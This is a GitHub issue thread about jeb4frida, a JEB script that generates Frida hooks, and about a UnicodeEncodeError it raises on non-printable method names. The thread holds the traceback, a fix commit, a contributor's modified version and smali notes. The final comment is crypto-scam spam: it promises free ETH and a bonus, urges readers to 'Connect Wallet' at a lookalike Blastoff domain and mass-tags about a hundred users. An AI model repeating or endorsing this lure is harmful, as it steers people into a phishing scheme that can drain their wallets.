### ISSUE TITLE
Broken Script Output for Non Ascii/Non Printable Named Method

### ISSUE THREAD

**Issue by apkunpacker** [Hamz-a/jeb4frida#1]
Small Sample Apk With Non Printable Method Name :

[newtest_1.0_flows.apk.zip](https://github.com/Hamz-a/jeb4frida/files/8286125/newtest_1.0_flows.apk.zip)

![jeb4frida](https://user-images.githubusercontent.com/27184655/158812216-668169bd-1e09-4beb-918a-77ef99923a63.jpg)

Exact Error -

```sh
🔥 Jeb4frida...
IJavaSourceUnit / IDexUnit detected
🔥 Here's a fresh Frida hook...
----------------------------------------------------------------------------------------------------
// Usage: frida -U -f com.example.myapplication -l hook.js --no-pause
[E] Script execution error: com.pnfsoftware.jeb.client.script.ScriptExecutionException: Traceback (most recent call last):
[E]   File "E:\JEB4.12\scripts\samples\Jeb4frida.py", line 39, in run
[E]     self.handle_java_dex(ctx, dexdec)
[E]   File "E:\JEB4.12\scripts\samples\Jeb4frida.py", line 73, in handle_java_dex
[E]     print(self.gen_java_hook(java_class, java_methods))
[E]   File "E:\JEB4.12\scripts\samples\Jeb4frida.py", line 79, in gen_java_hook
[E]     frida_hook = "    var {} = Java.use('{}');\n".format(class_name_var, class_name)
[E] UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-4: ordinal not in range(128)
[E] 
```

Possible Fix - Put method name in " " like ClassName["MethodName"].overload......

**Comment by Hamz-a** [comment]
I forgot the `u` prefix on a bunch of strings. So now it is trying to format these ASCII strings with Unicode characters, hence it fails. Adding `u` fixes the issue but makes the Frida script still look funky...

**Comment by Hamz-a** [comment]
https://github.com/Hamz-a/jeb4frida/commit/094830df8c129582baf80cd5af8129b7ebd6b371
Fixes the "JEB error", but would be better to encode "weird" characters for cleaner Frida scripts.

**Comment by kinetikFR** [comment]
[Jeb4frida.zip](https://github.com/Hamz-a/jeb4frida/files/13643822/Jeb4frida.zip)
[+] add Auto copy frida functio to clipBoard
[+] removed gen_how_to function (the frida hook was not generated because it didn't have IApkUnit and getMainProject) i working with lots of dump.dex that not have project  and its function interfered

Thank you very much for the project, it helps a lot :D

**Comment by kinetikFR** [comment]
about <clinit> jadX generates a simple variable reading
example

.method static constructor <clinit>()V
          .registers 1
00000000  const/16            v0, 18
00000004  new-array           v0, v0, [I
00000008  fill-array-data     v0, :14
0000000E  sput-object         v0, A->AMLDZHTU:[I
00000012  return-void

JadX output :
let A = Java.use("o.A");
          AMLDZHTU = A.AMLDZHTU.value;

**Comment by ZekDtonik** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
JoshBellingham, @neojo, @ash413, @rsmsctr, @lbtalbot, @butiase2015, @lopld, @Ritwick01, @mydanniel, @mimizhang, @wsearcymv, @slavakurilyak, @gib00n, @Iconic-ace, @abhishekdey4444, @Dipti821, @miguoro, @atrl, @jankod, @wtx626, @ilayzer, @vnxlau, @ihtisham-sudo, @cc0tea, @anton-karlovskiy, @olufuwatayo, @iamv1n, @Ankur-1717, @akanevans13, @soloman1124, @mdxaasil, @Harley0205, @Flow-matic, @Crytpo-io, @vfishv, @ngmisl, @Prem245, @krybkin, @PabloPRP, @fMercury, @Edu-BS, @NikolaySimakov, @Leonel-web, @SathishN, @Cavan, @ankur-katiyar, @mpgxc, @k7k0, @gritcsenko, @mlveinMarceloGCprog, @seepana-kiran, @marlitosdev, @agrahame, @anhtannguyen1999, @Bjenhamin4Alfredolvchenki, @JunaidMehmood, @KevinsBobo, @n0n5m1l3, @CWE-119, @mightychild, @0xSKJ, @tinaishe-dr16, @deepground, @jamesEmerson112, @thehizzey, @DiGarOn, @vittoriosironi, @arboat, @eldf7, @p-r-i-t-h-v-i, @Max10086, @frtendero, @SpiderFang, @tglaser11, @voskresenskiianton, @adiusz, @geastham, @programjourney1, @fountainhead-gq, @NeelDigonto, @pyromaus, @ffblanco83, @BlockchainSensei, @itsdchen, @Nektarium, @aomande002, @cropkey, @Exoutia, @wei-yuan, @zli42, @moraesmtb, @sachin96Boy, @yazhou-zyz, @hades601, @Bestchx, @dreamscape08, @Sidx369, @seconddayout, @dazes97
